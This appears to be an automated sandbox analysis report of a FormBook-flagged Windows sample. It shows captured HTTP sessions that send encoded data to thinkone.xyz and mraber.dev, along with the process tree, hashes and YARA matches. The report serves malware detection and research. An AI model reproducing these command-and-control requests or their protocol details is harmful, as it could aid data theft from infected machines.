                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.450018209.74.79.41805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:56:27.288276911 CET690OUTPOST /b0aw/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.thinkone.xyz
                                                Origin: http://www.thinkone.xyz
                                                Referer: http://www.thinkone.xyz/b0aw/
                                                Content-Length: 219
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 59 4d 47 59 75 52 61 68 39 6f 31 35 70 30 37 4b 51 4b 51 54 55 6f 4c 54 54 37 51 4a 42 6d 71 6b 6d 41 57 72 53 2f 68 63 6f 72 76 39 6d 5a 30 70 59 4e 56 63 73 73 55 67 54 69 45 76 4b 50 77 59 54 38 30 43 49 76 63 49 47 6b 54 69 76 5a 7a 44 44 48 53 7a 58 72 48 50 46 42 6b 4d 67 72 67 41 6c 71 74 38 42 66 6c 7a 59 65 57 51 79 70 36 6a 66 39 6f 35 45 71 71 47 6a 63 5a 41 39 69 6d 4f 49 37 2f 36 6e 49 77 70 30 4b 75 38 65 7a 56 58 4a 77 49 72 71 77 4b 76 69 7a 6a 64 6e 51 42 51 75 63 6d 51 71 6f 71 34 76 54 70 71 76 55 39 50 35 70 36 67 56 41 4b 32 62 33 4d 30 4a 74 68 38 2b 78 71 6b 72 4f 36 64 4e 54 7a 4b 33 32 6c 6c 69 53 4d 63 2f 4b 4d 3d
                                                Data Ascii: 94=YMGYuRah9o15p07KQKQTUoLTT7QJBmqkmAWrS/hcorv9mZ0pYNVcssUgTiEvKPwYT80CIvcIGkTivZzDDHSzXrHPFBkMgrgAlqt8BflzYeWQyp6jf9o5EqqGjcZA9imOI7/6nIwp0Ku8ezVXJwIrqwKvizjdnQBQucmQqoq4vTpqvU9P5p6gVAK2b3M0Jth8+xqkrO6dNTzK32lliSMc/KM=
                                                Jan 11, 2025 06:56:27.861274004 CET533INHTTP/1.1 404 Not Found
                                                Date: Sat, 11 Jan 2025 05:56:27 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.450019209.74.79.41805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:56:29.836471081 CET10772OUTPOST /b0aw/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.thinkone.xyz
                                                Origin: http://www.thinkone.xyz
                                                Referer: http://www.thinkone.xyz/b0aw/
                                                Content-Length: 10299
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 59 4d 47 59 75 52 61 68 39 6f 31 35 70 30 37 4b 51 4b 51 54 55 6f 4c 54 54 37 51 4a 42 6d 71 6b 6d 41 57 72 53 2f 68 63 6f 72 6e 39 6e 71 38 70 5a 75 74 63 74 73 55 67 50 79 45 79 4b 50 77 2f 54 2f 45 47 49 76 67 59 47 6e 37 69 70 4b 72 44 4b 57 53 7a 64 72 48 50 61 78 6b 4e 71 4c 67 56 6c 70 56 77 42 66 31 7a 59 65 57 51 79 75 43 6a 59 73 6f 35 47 71 71 48 71 38 5a 4d 71 79 6d 71 49 37 6e 41 6e 49 39 63 30 61 4f 38 5a 54 6c 58 47 6a 67 72 6a 77 4b 78 73 54 6a 46 6e 51 4e 35 75 63 54 70 71 74 2f 56 76 55 68 71 74 41 74 58 69 72 53 76 45 79 43 45 41 32 35 56 42 61 4a 6e 34 41 6a 5a 37 64 79 6f 56 67 6a 50 77 6e 77 77 6d 79 38 62 75 63 57 75 63 4c 42 6c 68 78 35 51 35 31 38 33 2b 32 66 78 41 42 6e 72 67 52 63 66 2b 67 2f 41 64 68 47 55 7a 39 79 6c 57 68 4c 45 46 2b 45 66 59 4b 79 37 64 35 57 37 70 39 59 50 66 4e 5a 39 70 48 6b 7a 55 71 61 44 37 36 73 67 62 4d 66 4d 2f 58 69 77 33 30 44 36 77 31 67 67 43 73 64 56 32 54 6b 44 67 33 41 55 64 56 34 52 65 73 48 49 35 2b 56 6d 71 4b 44 56 70 42 7a [TRUNCATED]
                                                Data Ascii: 94=YMGYuRah9o15p07KQKQTUoLTT7QJBmqkmAWrS/hcorn9nq8pZutctsUgPyEyKPw/T/EGIvgYGn7ipKrDKWSzdrHPaxkNqLgVlpVwBf1zYeWQyuCjYso5GqqHq8ZMqymqI7nAnI9c0aO8ZTlXGjgrjwKxsTjFnQN5ucTpqt/VvUhqtAtXirSvEyCEA25VBaJn4AjZ7dyoVgjPwnwwmy8bucWucLBlhx5Q5183+2fxABnrgRcf+g/AdhGUz9ylWhLEF+EfYKy7d5W7p9YPfNZ9pHkzUqaD76sgbMfM/Xiw30D6w1ggCsdV2TkDg3AUdV4ResHI5+VmqKDVpBzL24OFO+gFowys7pBRvgVsRhmhQVDatQfF4xonG7gDm8AReBBCafcYYCFMqVJgvJ/Nllh+E4urJWBESHREybHtfsfcc9PkuXsUGYhSWv+Mx2ZRCMWTU8eQ4PlXzT9QjFdUBTH/oKGSRFijJG/JVapyHx2n9wPwGJU1EMiA5YB/IVlrQPOWhDlWe8P1Eido5624CIRlM8B2hoQjcqe3hY34IMv+necULEw2O+11waiIY9KV67R/nUawCyzo4bZQa0ykY8UPlH6/yT+kPGV5ekKyTbuiDyIUDMhbLQ4syHrNcpSiG1OGbewqP1demB86CcwhJ8+yb+5BLYY9619/xwnPtxinZkdqQdgZD+vBwtOcPoMNLyQwZYPrlA4ksgA9lsvtBeHe0bGIQlc6wtxJjjBjCDtD3Ze+jPtF6VtIbYpe/+Ur4olEtmbDU5Gw+WJ8aI4/kLteVUI5nvuak1x1R7WdZs9AKW0MX6GQHgkenoNT9WfgDrOURxwPC1/3eclc3gpyLgwtucxqWFyO3nv5VtAyLI5DITQNZfal9sYLreRbCcGMg7dA3fVL8vzjXWampyiyVtOEg4eAcpjPaUpXJO0Or0tmOg6jJ1VOfsFOGX/+i6YYv3DsdrlXXB+zemvbTOD6r8ISEE8NGHgQM0MeKsRqaFVwQHi9ETdno [TRUNCATED]
                                                Jan 11, 2025 06:56:30.418767929 CET533INHTTP/1.1 404 Not Found
                                                Date: Sat, 11 Jan 2025 05:56:30 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.450020209.74.79.41805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:56:32.376277924 CET415OUTGET /b0aw/?TXVlY=nv6XU20pgPTDN0&94=VOu4tm+43rVZiGe5FbAiEYOvTb19T2jZsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLd6K3CAsSqZssuvcDLtxMQvu7+dmYX9caOt4= HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Host: www.thinkone.xyz
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Jan 11, 2025 06:56:32.948417902 CET548INHTTP/1.1 404 Not Found
                                                Date: Sat, 11 Jan 2025 05:56:32 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html; charset=utf-8
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.45002146.38.243.234805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:56:38.024276018 CET664OUTPOST /ixqi/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.mraber.dev
                                                Origin: http://www.mraber.dev
                                                Referer: http://www.mraber.dev/ixqi/
                                                Content-Length: 199
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 65 50 56 45 59 56 44 6f 70 53 62 79 75 45 54 41 30 33 64 74 73 30 4d 5a 4d 49 72 4c 76 68 77 36 79 37 35 4e 31 35 58 73 5a 49 61 53 2f 6e 4d 65 66 4b 79 55 67 65 6b 42 38 58 6a 48 5a 4f 61 59 59 4c 72 58 63 75 2b 42 61 57 7a 56 6e 37 51 51 5a 75 35 51 46 58 4f 4c 72 73 37 6d 74 36 4f 63 55 48 55 62 52 6f 42 78 51 2f 53 36 69 30 43 50 4b 42 64 45 64 49 6e 6f 37 6c 4f 30 57 48 7a 4d 79 6d 5a 64 6a 68 75 6c 4e 2b 44 6d 33 58 55 37 75 76 74 6e 78 38 37 46 4e 4d 53 73 54 37 4c 33 6c 2f 73 59 45 36 79 6d 66 52 72 30 2f 32 61 6a 7a 41 30 6f 78 61 30 32 67 36 39 51 36 37 50 6a 4a 77 3d 3d
                                                Data Ascii: 94=ePVEYVDopSbyuETA03dts0MZMIrLvhw6y75N15XsZIaS/nMefKyUgekB8XjHZOaYYLrXcu+BaWzVn7QQZu5QFXOLrs7mt6OcUHUbRoBxQ/S6i0CPKBdEdIno7lO0WHzMymZdjhulN+Dm3XU7uvtnx87FNMSsT7L3l/sYE6ymfRr0/2ajzA0oxa02g69Q67PjJw==


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.45002246.38.243.234805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:56:40.571866989 CET684OUTPOST /ixqi/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.mraber.dev
                                                Origin: http://www.mraber.dev
                                                Referer: http://www.mraber.dev/ixqi/
                                                Content-Length: 219
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 65 50 56 45 59 56 44 6f 70 53 62 79 75 6e 4c 41 79 55 31 74 71 55 4d 65 4a 49 72 4c 6b 42 77 2b 79 37 31 4e 31 34 44 43 46 74 4b 53 2f 43 49 65 65 49 61 55 6a 65 6b 42 76 58 6a 47 64 4f 61 74 59 4c 6e 66 63 73 61 42 61 57 58 56 6e 36 67 51 5a 64 51 69 4b 6e 4f 4a 6b 4d 37 65 77 4b 4f 63 55 48 55 62 52 6f 56 66 51 2f 61 36 69 6e 61 50 46 44 6c 4c 65 49 6e 70 7a 46 4f 30 63 58 7a 49 79 6d 5a 72 6a 67 79 44 4e 34 48 6d 33 57 6b 37 67 62 35 6b 37 38 36 4d 54 38 54 4e 43 59 71 62 67 64 78 70 50 59 36 4a 56 6a 54 6a 7a 51 58 35 69 78 56 2f 6a 61 51 46 39 39 30 6b 33 34 79 71 53 37 66 46 65 56 5a 51 42 6b 58 2f 2f 44 34 68 47 31 72 6c 4e 53 6b 3d
                                                Data Ascii: 94=ePVEYVDopSbyunLAyU1tqUMeJIrLkBw+y71N14DCFtKS/CIeeIaUjekBvXjGdOatYLnfcsaBaWXVn6gQZdQiKnOJkM7ewKOcUHUbRoVfQ/a6inaPFDlLeInpzFO0cXzIymZrjgyDN4Hm3Wk7gb5k786MT8TNCYqbgdxpPY6JVjTjzQX5ixV/jaQF990k34yqS7fFeVZQBkX//D4hG1rlNSk=


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.2.45002346.38.243.234805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:56:43.116882086 CET10766OUTPOST /ixqi/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.mraber.dev
                                                Origin: http://www.mraber.dev
                                                Referer: http://www.mraber.dev/ixqi/
                                                Content-Length: 10299
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 65 50 56 45 59 56 44 6f 70 53 62 79 75 6e 4c 41 79 55 31 74 71 55 4d 65 4a 49 72 4c 6b 42 77 2b 79 37 31 4e 31 34 44 43 46 74 43 53 2f 30 30 65 65 70 61 55 69 65 6b 42 30 33 6a 4c 64 4f 61 30 59 4c 2f 6c 63 73 6e 6a 61 51 54 56 6d 59 6f 51 56 38 51 69 64 33 4f 4a 76 73 37 6c 74 36 4f 4a 55 48 45 58 52 6f 46 66 51 2f 61 36 69 68 32 50 4d 78 64 4c 59 49 6e 6f 37 6c 4f 67 57 48 79 66 79 6d 52 56 6a 68 47 31 4e 4c 50 6d 35 56 4d 37 69 75 74 6b 33 38 36 4f 53 38 54 76 43 59 6d 45 67 64 38 57 50 5a 4f 6a 56 67 50 6a 77 46 4b 6d 6e 54 46 79 31 63 55 41 6f 4d 45 6e 78 34 71 49 61 4c 50 46 52 67 42 53 56 41 4c 4e 79 30 55 6b 63 45 33 36 63 6c 2f 42 4a 68 44 4c 6f 74 59 64 4f 79 76 64 6f 4b 75 30 69 45 4a 43 76 36 6e 61 34 71 56 6e 59 6c 66 65 33 42 63 6d 51 31 5a 4a 58 37 78 52 61 37 48 4e 42 7a 7a 33 45 4c 67 69 72 49 4d 38 43 6d 76 44 44 38 74 71 65 76 6a 48 63 51 45 69 63 4c 67 43 4b 5a 77 6e 4c 75 57 56 59 51 2f 48 6a 5a 65 2f 74 64 6a 75 30 43 6b 2f 34 32 66 73 67 33 77 6c 41 36 2f 63 44 30 51 [TRUNCATED]
                                                Data Ascii: 94=ePVEYVDopSbyunLAyU1tqUMeJIrLkBw+y71N14DCFtCS/00eepaUiekB03jLdOa0YL/lcsnjaQTVmYoQV8Qid3OJvs7lt6OJUHEXRoFfQ/a6ih2PMxdLYIno7lOgWHyfymRVjhG1NLPm5VM7iutk386OS8TvCYmEgd8WPZOjVgPjwFKmnTFy1cUAoMEnx4qIaLPFRgBSVALNy0UkcE36cl/BJhDLotYdOyvdoKu0iEJCv6na4qVnYlfe3BcmQ1ZJX7xRa7HNBzz3ELgirIM8CmvDD8tqevjHcQEicLgCKZwnLuWVYQ/HjZe/tdju0Ck/42fsg3wlA6/cD0Qhu/n805D1sHAm35yfut14gesZb3eeX1u0mQRc2iINf6ZP0AWP62OIZC/8pZuMju5BdSnQZUaVJ62TCDlhYgCJG3dLKb1fMzEr8bv2DSnGe+cE7UTzPKA5SeJPP8bT1E6o3BvCuZz3DYYr6Ac16CBcwLzsF31omKMatoKaUhgq9+4hgA6lq3e79IXISu9AjqQbKOwchNXvmsvOk0a0bT5FzgDzJrjCVmuCJX6+TSpCqC5a+U/sJkbUweri+uF8lsBxwvOR8ch6G8Z0aqGPCWwhQQVZg6OoY1Wl5pjUFZnNFlZjO6ofXOdtmdB6fHfU/3nhdC3jcm0FD7LdPFaQ6xVkIfxWZrTF75qz9qXb8F0PIquT1ktebEW8515d4R56eBEzARnkWNj7U+T+7oC9qYxaAgCtX6b16mYEHwGR+v4FRUpDJZd5hFCDGY0tcq1dOHf5+q47eUWa4NQATAc+BvvbVLOC0ugi9nkIiKwtl4WTL2ZIhbBWfwmbieZ5/IqbSj3EKxJ+pERguK82QX+XwK5Hy0Zicg8te/Y6CgFw40clhrJ/ch2oMYkfLUMEk1XqLvf4bMsbTTeN5aF1L2LhFqvGgwnKuc0iQ3VV8Tc79/ic0n/yn7WTnKjY0Xb8SgOboWL0cgunKAvre4BLW9aSYNQCLt+7ASv73TCXI [TRUNCATED]


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                20192.168.2.45002446.38.243.234805552C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 11, 2025 06:56:45.658754110 CET413OUTGET /ixqi/?94=TN9kbi/KmEXimVSL0ERanCo8EPrJiw0+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyN0TYvIjkiLeGXDgVU6Nef5fP7k6kFQJQYe0=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Host: www.mraber.dev
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:00:54:38
                                                Start date:11/01/2025
                                                Path:C:\Users\user\Desktop\BDlwy8b7Km.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\BDlwy8b7Km.exe"
                                                Imagebase:0x590000
                                                File size:1'334'784 bytes
                                                MD5 hash:95B9D05F97FBA1718D8C85967EBFFC4C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:1
                                                Start time:00:54:41
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\BDlwy8b7Km.exe"
                                                Imagebase:0x160000
                                                File size:46'504 bytes
                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2050133802.0000000008C90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2044049875.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2044978027.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:00:55:05
                                                Start date:11/01/2025
                                                Path:C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe"
                                                Imagebase:0x680000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3560373501.0000000003830000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:6
                                                Start time:00:55:07
                                                Start date:11/01/2025
                                                Path:C:\Windows\SysWOW64\relog.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\relog.exe"
                                                Imagebase:0x700000
                                                File size:45'568 bytes
                                                MD5 hash:DA20D543A130003B427AEB18AE2FE094
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3560396995.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3560327261.0000000003380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3558981599.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                General

                                                Target ID:7
                                                Start time:00:55:20
                                                Start date:11/01/2025
                                                Path:C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe"
                                                Imagebase:0x680000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:8
                                                Start time:00:55:32
                                                Start date:11/01/2025
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff6bf500000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:3%
                                                  Dynamic/Decrypted Code Coverage:1%
                                                  Signature Coverage:5.1%
                                                  Total number of Nodes:1789
                                                  Total number of Limit Nodes:59
